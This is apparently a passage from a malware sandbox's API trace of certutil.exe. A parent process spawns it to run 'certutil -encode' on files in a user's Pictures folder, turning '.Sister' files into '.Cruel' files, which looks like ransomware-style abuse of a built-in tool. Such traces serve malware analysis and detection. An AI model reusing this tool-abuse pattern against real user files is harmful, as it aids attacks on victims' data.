\"k8h31.jpg.Sister\" \"k8h31.jpg.Cruel\"" [0299.650] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x275c2efb9f0 [0299.650] GetSystemTime (in: lpSystemTime=0xa435a7f3e0 | out: lpSystemTime=0xa435a7f3e0*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x32, wSecond=0xe, wMilliseconds=0xbe)) [0299.650] SystemTimeToFileTime (in: lpSystemTime=0xa435a7f3e0, lpFileTime=0xa435a7f3d8 | out: lpFileTime=0xa435a7f3d8) returned 1 [0299.650] FileTimeToLocalFileTime (in: lpFileTime=0xa435a7f3d8, lpLocalFileTime=0xa435a7f3a0 | out: lpLocalFileTime=0xa435a7f3a0) returned 1 [0299.650] FileTimeToSystemTime (in: lpFileTime=0xa435a7f3a0, lpSystemTime=0xa435a7f110 | out: lpSystemTime=0xa435a7f110) returned 1 [0299.650] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0xa435a7f110, lpFormat=0x0, lpDateStr=0xa435a7f220, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0299.650] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0xa435a7f110, lpFormat=0x0, lpTimeStr=0xa435a7f120, cchTime=128 | out: lpTimeStr="8:50 PM") returned 8 [0299.650] _vsnwprintf (in: _Buffer=0xa435a7f12e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0xa435a7f0f8 | out: _Buffer=" 14.190s") returned 8 [0299.650] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x275c2efde90 [0299.650] SetLastError (dwErrCode=0x80070716) [0299.651] _vsnwprintf (in: _Buffer=0xa435a7f1a8, _BufferCount=0xb, _Format="%d", _ArgList=0xa435a7f198 | out: _Buffer="948") returned 3 [0299.651] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0xa435a7ef60, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0299.651] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x275c2efbab0 [0299.651] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x275c2ef20f0 [0299.651] LocalFree (hMem=0x275c2efde90) returned 0x0 [0299.651] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xa435a7f450 | out: lpSystemTimeAsFileTime=0xa435a7f450*(dwLowDateTime=0xdd36fcbd, dwHighDateTime=0x1d6141f)) [0299.651] GetLocalTime (in: lpSystemTime=0xa435a7f488 | out: lpSystemTime=0xa435a7f488*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x32, wSecond=0xe, wMilliseconds=0xbf)) [0299.651] SystemTimeToFileTime (in: lpSystemTime=0xa435a7f488, lpFileTime=0xa435a7f460 | out: lpFileTime=0xa435a7f460) returned 1 [0299.651] CompareFileTime (lpFileTime1=0xa435a7f460, lpFileTime2=0xa435a7f450) returned 1 [0299.651] _vsnwprintf (in: _Buffer=0xa435a7f498, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0xa435a7f428 | out: _Buffer="GMT + 2.00") returned 10 [0299.652] LocalFree (hMem=0x275c2efb9f0) returned 0x0 [0299.652] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0299.652] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0299.652] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0299.652] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0299.652] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0299.652] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0xa435a7f4c8 | out: _Buffer="10.0.15063.447") returned 14 [0299.652] GetACP () returned 0x4e4 [0299.652] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0299.652] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x275c2efb930 [0299.653] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x275c2efb930, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0299.654] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x275c2efe210 [0299.654] _vsnwprintf (in: _Buffer=0x275c2efe210, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xa435a7f518 | out: _Buffer="10.0.15063.447 retail") returned 21 [0299.654] LocalFree (hMem=0x275c2efb930) returned 0x0 [0299.654] LocalFree (hMem=0x0) returned 0x0 [0299.654] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0299.654] GetACP () returned 0x4e4 [0299.654] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0299.654] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x275c2efbad0 [0299.654] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x275c2efbad0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0299.654] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x275c2efdd90 [0299.654] _vsnwprintf (in: _Buffer=0x275c2efdd90, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xa435a7f518 | out: _Buffer="10.0.15063.447 retail") returned 21 [0299.654] LocalFree (hMem=0x275c2efbad0) returned 0x0 [0299.654] LocalFree (hMem=0x0) returned 0x0 [0299.655] GetACP () returned 0x4e4 [0299.655] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0299.655] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x275c2efbad0 [0299.655] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x275c2efbad0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0299.655] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x275c2efdf50 [0299.655] _vsnwprintf (in: _Buffer=0x275c2efdf50, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xa435a7f548 | out: _Buffer="10.0.15063.447 retail") returned 21 [0299.655] LocalFree (hMem=0x275c2efbad0) returned 0x0 [0299.655] LocalFree (hMem=0x275c2efe210) returned 0x0 [0299.655] LocalFree (hMem=0x275c2efdd90) returned 0x0 [0299.655] LocalFree (hMem=0x275c2efdf50) returned 0x0 [0299.655] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0299.655] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0299.655] GetStockObject (i=0) returned 0x900010 [0299.655] RegisterClassW (lpWndClass=0xa435a7f670) returned 0xc1a2 [0299.656] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x2602c8 [0299.673] NtdllDefWindowProc_W () returned 0x0 [0299.673] NtdllDefWindowProc_W () returned 0x1 [0299.680] NtdllDefWindowProc_W () returned 0x0 [0299.690] UpdateWindow (hWnd=0x2602c8) returned 1 [0299.690] PostMessageW (hWnd=0x2602c8, Msg=0x400, wParam=0x0, lParam=0x275c2ee217e) returned 1 [0299.690] GetMessageW (in: lpMsg=0xa435a7f6c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xa435a7f6c0) returned 1 [0299.690] TranslateMessage (lpMsg=0xa435a7f6c0) returned 0 [0299.690] DispatchMessageW (lpMsg=0xa435a7f6c0) returned 0x0 [0299.690] NtdllDefWindowProc_W () returned 0x0 [0299.690] GetMessageW (in: lpMsg=0xa435a7f6c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xa435a7f6c0) returned 1 [0299.690] TranslateMessage (lpMsg=0xa435a7f6c0) returned 0 [0299.690] DispatchMessageW (lpMsg=0xa435a7f6c0) returned 0x0 [0299.690] LocalAlloc (uFlags=0x0, uBytes=0x5a) returned 0x275c2ee43b0 [0299.690] LocalAlloc (uFlags=0x0, uBytes=0x66) returned 0x275c2ee84f0 [0299.691] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0299.691] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0299.691] SetLastError (dwErrCode=0x80070716) [0299.691] _vsnwprintf (in: _Buffer=0xa435a7f0c8, _BufferCount=0xb, _Format="%d", _ArgList=0xa435a7f0b8 | out: _Buffer="465") returned 3 [0299.691] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0xa435a7ee80, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0299.691] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x275c2eeb790 [0299.691] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0299.691] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0299.691] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0xa435a7ee60, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0299.691] GetLastError () returned 0xcb [0299.692] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0299.692] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0299.692] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0299.692] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0299.692] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0299.692] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0299.692] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0299.692] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0299.692] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0299.692] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0299.692] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0299.692] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0299.692] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0299.692] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0299.692] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0299.692] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0299.692] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0299.692] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0299.692] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0299.692] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0299.692] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0299.693] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0xa435a7eb28 | out: phkResult=0xa435a7eb28*=0x23c) returned 0x0 [0299.693] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x275c2eeae40 [0299.693] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0xa435a7f098, lpData=0xa435a7f0c8, lpcbData=0xa435a7f090*=0x4 | out: lpType=0xa435a7f098*=0x0, lpData=0xa435a7f0c8*=0x0, lpcbData=0xa435a7f090*=0x4) returned 0x2 [0299.693] LocalFree (hMem=0x275c2eeae40) returned 0x0 [0299.693] RegCloseKey (hKey=0x23c) returned 0x0 [0299.693] LocalFree (hMem=0x0) returned 0x0 [0299.693] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x275c2f0bcc0 [0299.706] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0299.706] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0299.706] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0299.706] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0299.706] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0299.706] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0299.706] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0299.706] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0299.706] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0299.706] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0299.707] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0299.707] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0299.707] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0299.707] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0299.707] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0299.707] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0299.707] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x275c2f10bb0 [0299.707] GetComputerNameW (in: lpBuffer=0x275c2f10bb0, nSize=0xa435a7f090 | out: lpBuffer="NQDPDE", nSize=0xa435a7f090) returned 1 [0299.708] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0xa435a7f060 | out: lpBuffer=0x0, nSize=0xa435a7f060) returned 0 [0299.708] GetLastError () returned 0xea [0299.708] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x275c2efbb50 [0299.708] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x275c2efbb50, nSize=0xa435a7f060 | out: lpBuffer="NQdPdE", nSize=0xa435a7f060) returned 1 [0299.708] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0299.712] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x275c2f10e00, cbCertEncoded=0xeb27) returned 0x0 [0299.716] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x275c2f10e00, cbCrlEncoded=0xeb27) returned 0x0 [0299.718] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x275c2f10e00, cbEncoded=0xeb27, dwFlags=0x8000, pDecodePara=0xa435a7ef40, pvStructInfo=0xa435a7efd0, pcbStructInfo=0xa435a7efc4 | out: pvStructInfo=0xa435a7efd0, pcbStructInfo=0xa435a7efc4) returned 0 [0299.718] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x275c2f10e00, cbEncoded=0xeb27, dwFlags=0x8000, pDecodePara=0xa435a7ef40, pvStructInfo=0xa435a7efd0, pcbStructInfo=0xa435a7efc4 | out: pvStructInfo=0xa435a7efd0, pcbStructInfo=0xa435a7efc4) returned 0 [0299.718] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x275c2f10e00, cbEncoded=0xeb27, dwFlags=0x8000, pDecodePara=0xa435a7ef40, pvStructInfo=0xa435a7efd0, pcbStructInfo=0xa435a7efc4 | out: pvStructInfo=0xa435a7efd0, pcbStructInfo=0xa435a7efc4) returned 0 [0299.718] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x275c2ef30d0 [0299.728] CryptMsgUpdate (hCryptMsg=0x275c2ef30d0, pbData=0x275c2f10e00, cbData=0xeb27, fFinal=1) returned 0 [0299.728] GetLastError () returned 0x8009310b [0299.728] CryptMsgClose (hCryptMsg=0x275c2ef30d0) returned 1 [0299.728] GetFileAttributesExW (in: lpFileName="k8h31.jpg.Sister" (normalized: "c:\\users\\fd1hvy\\pictures\\k8h31.jpg.sister"), fInfoLevelId=0x0, lpFileInformation=0xa435a7eff0 | out: lpFileInformation=0xa435a7eff0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1aaac0, ftCreationTime.dwHighDateTime=0x1d5e299, ftLastAccessTime.dwLowDateTime=0xdec32e50, ftLastAccessTime.dwHighDateTime=0x1d5e94b, ftLastWriteTime.dwLowDateTime=0xdec32e50, ftLastWriteTime.dwHighDateTime=0x1d5e94b, nFileSizeHigh=0x0, nFileSizeLow=0xeb27)) returned 1 [0299.728] _vsnwprintf (in: _Buffer=0xa435a7eff8, _BufferCount=0xb, _Format="%d", _ArgList=0xa435a7efe8 | out: _Buffer="359") returned 3 [0299.728] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0xa435a7edb0, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0299.728] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x275c2f10820 [0299.728] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0299.728] _vsnwprintf (in: _Buffer=0xa435a7dfe0, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0xa435a7f038 | out: _Buffer="Input Length = 60199") returned 20 [0299.729] GetFileType (hFile=0x50) returned 0x2 [0299.729] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xa435a7dfe0*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0xa435a7df94, lpReserved=0x0 | out: lpBuffer=0xa435a7dfe0*, lpNumberOfCharsWritten=0xa435a7df94*=0x14) returned 1 [0299.730] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0299.730] _vsnwprintf (in: _Buffer=0xa435a7dfe0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xa435a7f038 | out: _Buffer="\n") returned 1 [0299.730] GetFileType (hFile=0x50) returned 0x2 [0299.730] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xa435a7dfe0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xa435a7df94, lpReserved=0x0 | out: lpBuffer=0xa435a7dfe0*, lpNumberOfCharsWritten=0xa435a7df94*=0x1) returned 1 [0299.748] GetFileAttributesExW (in: lpFileName="k8h31.jpg.Cruel" (normalized: "c:\\users\\fd1hvy\\pictures\\k8h31.jpg.cruel"), fInfoLevelId=0x0, lpFileInformation=0xa435a7eff0 | out: lpFileInformation=0xa435a7eff0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd44437d, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xdd44437d, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xdd45cbab, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x14392)) returned 1 [0299.748] _vsnwprintf (in: _Buffer=0xa435a7eff8, _BufferCount=0xb, _Format="%d", _ArgList=0xa435a7efe8 | out: _Buffer="361") returned 3 [0299.748] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0xa435a7edb0, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0299.748] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x275c2f10d00 [0299.748] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0299.748] _vsnwprintf (in: _Buffer=0xa435a7dfe0, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0xa435a7f038 | out: _Buffer="Output Length = 82834") returned 21 [0299.748] GetFileType (hFile=0x50) returned 0x2 [0299.748] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xa435a7dfe0*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0xa435a7df94, lpReserved=0x0 | out: lpBuffer=0xa435a7dfe0*, lpNumberOfCharsWritten=0xa435a7df94*=0x15) returned 1 [0299.751] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0299.751] _vsnwprintf (in: _Buffer=0xa435a7dfe0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xa435a7f038 | out: _Buffer="\n") returned 1 [0299.751] GetFileType (hFile=0x50) returned 0x2 [0299.751] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xa435a7dfe0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xa435a7df94, lpReserved=0x0 | out: lpBuffer=0xa435a7dfe0*, lpNumberOfCharsWritten=0xa435a7df94*=0x1) returned 1 [0299.756] LocalFree (hMem=0x275c2f10e00) returned 0x0 [0299.757] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0299.757] _vsnwprintf (in: _Buffer=0xa435a7f058, _BufferCount=0xb, _Format="%d", _ArgList=0xa435a7f048 | out: _Buffer="2022") returned 4 [0299.757] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0xa435a7ee10, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0299.757] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x275c2ee8910 [0299.757] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0299.757] _vsnwprintf (in: _Buffer=0xa435a7e040, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0xa435a7f098 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0299.757] GetFileType (hFile=0x50) returned 0x2 [0299.758] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xa435a7e040*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0xa435a7dff4, lpReserved=0x0 | out: lpBuffer=0xa435a7e040*, lpNumberOfCharsWritten=0xa435a7dff4*=0x31) returned 1 [0299.758] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0299.758] _vsnwprintf (in: _Buffer=0xa435a7e040, _BufferCount=0x1ff, _Format="\n", _ArgList=0xa435a7f098 | out: _Buffer="\n") returned 1 [0299.758] GetFileType (hFile=0x50) returned 0x2 [0299.758] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xa435a7e040*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xa435a7dff4, lpReserved=0x0 | out: lpBuffer=0xa435a7e040*, lpNumberOfCharsWritten=0xa435a7dff4*=0x1) returned 1 [0299.765] LocalFree (hMem=0x0) returned 0x0 [0299.765] LocalFree (hMem=0x275c2ee84f0) returned 0x0 [0299.766] LocalFree (hMem=0x275c2ee43b0) returned 0x0 [0299.766] SetLastError (dwErrCode=0x80070716) [0299.766] _vsnwprintf (in: _Buffer=0xa435a7f0c8, _BufferCount=0xb, _Format="%d", _ArgList=0xa435a7f0b8 | out: _Buffer="511") returned 3 [0299.766] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0xa435a7ee80, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0299.766] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x275c2f10670 [0299.766] PostQuitMessage (nExitCode=0) [0299.766] GetMessageW (in: lpMsg=0xa435a7f6c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xa435a7f6c0) returned 0 [0299.766] LocalFree (hMem=0x275c2efbb50) returned 0x0 [0299.766] LocalFree (hMem=0x275c2f10bb0) returned 0x0 [0299.766] LocalFree (hMem=0x0) returned 0x0 [0299.767] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0299.767] GetLastError () returned 0x7e [0299.767] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0299.767] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0299.767] DllMain () returned 0x1 [0299.767] LocalFree (hMem=0x275c2efbab0) returned 0x0 [0299.767] LocalFree (hMem=0x275c2eeb790) returned 0x0 [0299.768] LocalFree (hMem=0x275c2f10820) returned 0x0 [0299.768] LocalFree (hMem=0x275c2f10d00) returned 0x0 [0299.768] LocalFree (hMem=0x275c2ee8910) returned 0x0 [0299.768] LocalFree (hMem=0x275c2f10670) returned 0x0 [0299.768] LocalFree (hMem=0x275c2ef20f0) returned 0x0 [0299.768] LocalFree (hMem=0x275c2eebd60) returned 0x0 [0299.768] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0299.768] GetLastError () returned 0x7e [0299.768] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0299.768] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0299.768] DllMain () returned 0x1 [0299.769] exit (_Code=0) Thread: id = 128 os_tid = 0x12ec Process: id = "51" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x2688c000" os_pid = "0x1290" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"lrXVOGLmm_sYY.png.Sister\" \"lrXVOGLmm_sYY.png.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Pictures\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 129 os_tid = 0x11f4 [0300.097] GetStartupInfoW (in: lpStartupInfo=0x230567fbb0 | out: lpStartupInfo=0x230567fbb0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"lrXVOGLmm_sYY.png.Sister\" \"lrXVOGLmm_sYY.png.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0300.101] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0300.104] __set_app_type (_Type=0x1) [0300.104] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0300.105] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0300.107] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 